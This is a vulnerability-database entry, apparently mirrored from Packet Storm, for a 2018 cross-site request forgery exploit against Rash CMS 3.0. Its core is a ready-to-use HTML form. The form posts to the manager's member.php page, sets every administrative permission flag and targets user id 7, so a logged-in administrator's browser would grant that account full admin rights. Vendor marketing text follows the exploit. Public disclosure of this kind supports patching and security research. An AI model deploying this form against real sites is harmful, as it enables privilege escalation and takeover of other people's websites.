Lucene search
K

Rash CMS 3.0 Cross Site Request Forgery

🗓️ 01 Jun 2018 00:00:00Reported by Hesam BazvandType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Rash CMS 3.0 CSRF Vulnerability in member.ph

Code
` # Exploit Title: Rash CMS CSRF Vulnerability  
# Exploit Author: Hesam Bazvand  
# Contact: [email protected]  
# Software Link: http://www.rashcms.com/rashcms.zip  
# Version: 3.0  
# Tested on: Windows 10 / Kali Linux  
# Category: WebApps  
  
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#  
  
Exploit :  
  
<form action="http://localhost/rash/manager/pages/member.php"  
method="POST">  
<input type="text" name="task" value="update"><br>  
<input type="text" name="accsess_admin_acc" value="1"><br>  
<input type="text" name="newpost" value="1"><br>  
<input type="text" name="editotherposts" value="1"><br>  
<input type="text" name="backup" value="1"><br>  
<input type="text" name="postmgr" value="1"><br>  
<input type="text" name="comment" value="1"><br>  
<input type="text" name="cat" value="1"><br>  
<input type="text" name="block" value="1"><br>  
<input type="text" name="extra" value="1"><br>  
<input type="text" name="member" value="1"><br>  
<input type="text" name="inbox" value="1"><br>  
<input type="text" name="uc" value="1"><br>  
<input type="text" name="banned" value="1"><br>  
<input type="text" name="template" value="1"><br>  
<input type="text" name="setting" value="1"><br>  
<input type="text" name="permission" value="1"><br>  
<input type="text" name="module" value="1"><br>  
<input type="text" name="usrid" value="7"><br>  
<input type="submit" value="Submit">  
</form>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation